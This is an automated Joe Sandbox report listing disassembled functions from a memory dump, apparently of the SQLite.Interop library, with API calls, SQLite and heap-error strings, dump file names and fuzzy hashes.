SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AB6D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCD6427

Strings

%s at line %d of [%.10s], xrefs: 6BCD6420
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCD6411
misuse, xrefs: 6BCD641B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.$Idb45e174afb28e2c.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2065001458-160653349
Opcode ID: 0de64b323f25ed256f4ce218da8ac5ac8840246a2f63662f2c6c2025af67ec12
Instruction ID: 77598f3a41c1e53430c5f2890e98af86ac5c8bdb8544f1fcc205190e72d26093
Opcode Fuzzy Hash: 0de64b323f25ed256f4ce218da8ac5ac8840246a2f63662f2c6c2025af67ec12
Instruction Fuzzy Hash: EE11D276B6161427FA005A69AC82F6B734C9B81A7DF000132FB18EB1C1F769EA10C2B1

Function 6BC60BF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000E,%s at line %d of [%.10s],cannot open file,0001002A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000), ref: 6BC60D7A

Strings

%s at line %d of [%.10s], xrefs: 6BC60D73
cannot open file, xrefs: 6BC60D6E
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC60D64

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$cannot open file$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-1856461355
Opcode ID: 5da86f60ac647253784052b6d1e62fe8367e4352bc6c4dc0ef7b5550cd6d7c66
Instruction ID: e7dc5e650eb13447cd00e0b3e76d37469a15afb52fe00bb069dc07c77e83d970
Opcode Fuzzy Hash: 5da86f60ac647253784052b6d1e62fe8367e4352bc6c4dc0ef7b5550cd6d7c66
Instruction Fuzzy Hash: 8B510631A54740AFE721DB64C8C5F4737E1AB84354F100599D98AAB381F7BDFA86C782

Function 6BC67E70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011F6E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,00000000,6BC73BDB,00000000,00000000,?,00000000,?,6BC7A704,00000000), ref: 6BC67F04

Part of subcall function 6BC60AD0: SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113C6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000074,00000000,?,?,?,?), ref: 6BC60AF8

Strings

%s at line %d of [%.10s], xrefs: 6BC67EFD
database corruption, xrefs: 6BC67EF8
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC67EEE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 4a018d9436152c749a9b6dd96197c3e0e4f67c6030e62b3a3335cada3b72b53f
Instruction ID: f9293b5b183cc8f9cdb5d12396cd0eb5d90a460b35a5483bcf7992517cc68938
Opcode Fuzzy Hash: 4a018d9436152c749a9b6dd96197c3e0e4f67c6030e62b3a3335cada3b72b53f
Instruction Fuzzy Hash: 2A115361618B504FD324CF38C8C0E63BBF1AF68720B10089EE697CB692F729E805C321

Function 6BC51B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00BD0000,00000000,6BD15724,00000000,00000000,?,6BC61242,6BD1A358,6BD1A358), ref: 6BC51B41
SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu,00000000,?,6BC61242,6BD1A358,6BD1A358), ref: 6BC51B5E

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 6BC51B57

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: CreateHeapI769271af19a2299d.
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 1906285390-982776804
Opcode ID: 1432479d6a72cfc5def2d5d441e61fb95e5514883e08475a928080d9d7d2fac2
Instruction ID: e8d16d2a907e6b7738a60117d34b17c482d27ef01638696537e128437a71a271
Opcode Fuzzy Hash: 1432479d6a72cfc5def2d5d441e61fb95e5514883e08475a928080d9d7d2fac2
Instruction Fuzzy Hash: C4F02D735592246BE7205E59EC8DF4B7B6CD7C2B78F4000A2F90C8F100F239D1208664

Function 6BC51C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(06900000,00000000,?), ref: 6BC51C84
SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to HeapAlloc %u bytes (%lu), heap=%p,?,00000000), ref: 6BC51CA0

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 6BC51C99

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: AllocateHeapI769271af19a2299d.
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 525675213-667713680
Opcode ID: dfecf787f0c8ea6b0fa21533d6aa024364978a6c8aadfd0eed9c27c17752cde3
Instruction ID: dd3d36c2d36cb99221cb1ef0e233d26f70fbec741cf62b0c3ee53fbf7d950860
Opcode Fuzzy Hash: dfecf787f0c8ea6b0fa21533d6aa024364978a6c8aadfd0eed9c27c17752cde3
Instruction Fuzzy Hash: F3E0D873A412143BE52155DD9C89F67B76CD745AA9F400021FB0CCF200D524EC0143B0

Function 6BC51C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(06900000,00000000,?), ref: 6BC51C47
SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to HeapFree block %p (%lu), heap=%p,?,00000000), ref: 6BC51C61

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 6BC51C5A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: FreeHeapI769271af19a2299d.
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 1119003892-4030396798
Opcode ID: 42c7323ff9f4036419d49ed584c16efd19679f2982fa50886a810f22540fd7d7
Instruction ID: 3ce4400dc8c0c8e9cb08a36f79722dc90e4c3f157a7af7e176ddd124f5a521f1
Opcode Fuzzy Hash: 42c7323ff9f4036419d49ed584c16efd19679f2982fa50886a810f22540fd7d7
Instruction Fuzzy Hash: EDE02633A42320BBE5101AAE9C0AFA77B6C9B42A65F440061FB0CDF140E629F51143F0

Function 6BC85CA0 Relevance: 4.6, APIs: 3, Instructions: 84COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,6BC88DFE,?,?,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC85D1C
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,6BC88DFE,?,?,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC85D45
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,6BC88DFE,?,?,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF), ref: 6BC85D68

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: d2d6b3bea24a3b83f696defbb4ea9012dcbcb2fc8941706c75b9794e21145250
Instruction ID: feedc593eabcca263a1869f577933268713dd9c28aa548e262579f984572fe90
Opcode Fuzzy Hash: d2d6b3bea24a3b83f696defbb4ea9012dcbcb2fc8941706c75b9794e21145250
Instruction Fuzzy Hash: 0921F2B0A216415BE700CF34D540B2ABBE5AF0025CF0441A9DD168B741FB69FE54CBD1

Function 6BC1C820 Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC1C871
_memset.LIBCMT ref: 6BC1C8EB

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f67cfdd299c37ce8f688a9e41ad2c0f7e82986a8450e40b5485742f7c550a82d
Instruction ID: 65f01cea4ff4b08e68122466c5169cfa4e70cb45e196dd93c3c1af6adb24afab
Opcode Fuzzy Hash: f67cfdd299c37ce8f688a9e41ad2c0f7e82986a8450e40b5485742f7c550a82d
Instruction Fuzzy Hash: CA518070A04705EBEB10CFA4D881B5AB7F5FF49308F5041A8E949AB350F738EA05DBA1

Function 6BC63EA0 Relevance: 3.1, APIs: 2, Instructions: 119COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC63FB5
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,00000000,?,?,?,?,?,?,6BC863FC), ref: 6BC63FBE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: c8ea5547db4f96c0ab1937c20a3f39c77a097fd7fd98ad8d7f2009399ed5f71e
Instruction ID: 5a08338228c05c20e3c8e14b68eb1b407e7de872bcc68d6624a0efbc55624de5
Opcode Fuzzy Hash: c8ea5547db4f96c0ab1937c20a3f39c77a097fd7fd98ad8d7f2009399ed5f71e
Instruction Fuzzy Hash: 0C3193717253016BE724DE68DCC1F2AB3A4ABC4754F0405A8F918C7280F779EA59C7A3

Function 6BC1C700 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC1C738
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC1C7E0

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d._memset
String ID:
API String ID: 1786038377-0
Opcode ID: 93cd5a3bc7e2a3405d32088da0f50819da8a8092569bb1e458566f5acbb80bac
Instruction ID: 79f183fa5b872bb3537978ff8a627595121f6b61cc40f044ef3b062ded9fdb8f
Opcode Fuzzy Hash: 93cd5a3bc7e2a3405d32088da0f50819da8a8092569bb1e458566f5acbb80bac
Instruction Fuzzy Hash: 7B31EC716142009BE310CF69D881B9BB7E8EF84314F0042ADFD499B750E7B9EA15C7A1

Function 052BCA88 Relevance: 1.7, APIs: 1, Instructions: 216COMMON

Download Yara Rule

APIs

_SI074a26a6bce53634@4.SQLITE.INTEROP(00000000), ref: 052BCBEF

Memory Dump Source

Source File: 00000007.00000002.2184837156.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_52b0000_v2.jbxd

Similarity

API ID: I074a26a6bce53634@4.
String ID:
API String ID: 2344412737-0
Opcode ID: 791dc7dc4a0cdf89c0f3710e62385f4212968f8ebe7f681534396d849cb796e5
Instruction ID: 7a82f5af2b73ac2f8f3a664a66d01bab43dc963d4099dd9458df3438d23a1737
Opcode Fuzzy Hash: 791dc7dc4a0cdf89c0f3710e62385f4212968f8ebe7f681534396d849cb796e5
Instruction Fuzzy Hash: 1281CF71E102599FCB14DF68D894ADEBBB6FF89350F14846AE409EB391CB709C01CB91

Function 052B5A38 Relevance: 1.7, APIs: 1, Instructions: 206COMMON

Download Yara Rule

APIs

SI2102da665922f66a.SQLITE.INTEROP(00000000), ref: 052B5A9B

Memory Dump Source

Source File: 00000007.00000002.2184837156.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_52b0000_v2.jbxd

Similarity

API ID: I2102da665922f66a.
String ID:
API String ID: 37076536-0
Opcode ID: 6702b9b996aa62bd2956b866142e0b0c8268602a3239f1a52e6b2c877c540376
Instruction ID: 1eec65299f09f8a7cb4330af086bb6b8eec16f03c9ebd49a2f3379905e4db49d
Opcode Fuzzy Hash: 6702b9b996aa62bd2956b866142e0b0c8268602a3239f1a52e6b2c877c540376
Instruction Fuzzy Hash: E7817FB0E102098FDB54DFADC454AAEFBF2BF89300F14845AD459EB351DB74A944CBA1

Function 6BC2C4D0 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2C4FD

Part of subcall function 6BC07400: SIaa0f8e0c251cfd1d.SQLITE.INTEROP(0000000B,6BC1D2C9,?,?,?,6BC0CC8A,?,?,?,?,?,?,?), ref: 6BC07415

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d._memset
String ID:
API String ID: 1786038377-0
Opcode ID: dee9851e62cfdafd683e93b39deab0f9da8341e689e89cc2d9d9661bdc032569
Instruction ID: 2cde034955082c7abead0a3c8d61f38caf4e7ccbe8a71d9cd0ead560d12ce38d
Opcode Fuzzy Hash: dee9851e62cfdafd683e93b39deab0f9da8341e689e89cc2d9d9661bdc032569
Instruction Fuzzy Hash: 565169B19157008FC714DF28C8C185BBBF4EFC8314F505A9EE8A99B215EB75EA41CB92

Function 6BCC5630 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BCC5737

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 3e23da29ceb4639ca61e264cb38f9888d93f6060834be56c944ac8a61503dc15
Instruction ID: e9383bfccb366593a21f6b25e3f8a2c68a0d291d9f380c382d4857993cc329e0
Opcode Fuzzy Hash: 3e23da29ceb4639ca61e264cb38f9888d93f6060834be56c944ac8a61503dc15
Instruction Fuzzy Hash: 5441C1719362018BFB218F28D84770FBBA5A75271DF900164DB0A9E341FB7DC6968B93

Function 6BC68820 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,6BC863FC), ref: 6BC6897C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: 2a6d5c9368332fa734d5e03efaf87516078759c4359294716c2c82eb2b0060b9
Instruction ID: 6947f3076285dc1322933e3cef9e763086b0a03829ea38cd44bb2f657e2bc512
Opcode Fuzzy Hash: 2a6d5c9368332fa734d5e03efaf87516078759c4359294716c2c82eb2b0060b9
Instruction Fuzzy Hash: 2E414075A202019BEB04DF68C8C1F6A77A5AF46354F0840B9DD198F346FB39EA05C7A1

Function 6BC1A520 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,6BC975A2,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BC1A669

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: dc85f3e4a3370d784cd8aa4c251bf0fe600618fb4f6ca6e0e7d710bd1539fdb6
Instruction ID: ef822cbf76052418998640374ba46058b669f8cefa2cffa11ce119e52dff61f6
Opcode Fuzzy Hash: dc85f3e4a3370d784cd8aa4c251bf0fe600618fb4f6ca6e0e7d710bd1539fdb6
Instruction Fuzzy Hash: 5D41C770619605DBDB198F68D4857EAF7A4BF89308F400259F83D67200F73AE699DF81

Function 6BC069F0 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC06AC0

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 5a3bb25a9aa481592c19f1dd5315a82d14c58b1e9d0ec8824692e5c5220b676e
Instruction ID: 82c9baff8443cf50e32719c69ee55eab6e8e1f13cbd74c25a8d90edffab6edc3
Opcode Fuzzy Hash: 5a3bb25a9aa481592c19f1dd5315a82d14c58b1e9d0ec8824692e5c5220b676e
Instruction Fuzzy Hash: 5E317CB07116029FE704EF14C590E2277A9FF48719B10C2BCE90A4F352EB3AE991CB94

Function 6BC07400 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(0000000B,6BC1D2C9,?,?,?,6BC0CC8A,?,?,?,?,?,?,?), ref: 6BC07415

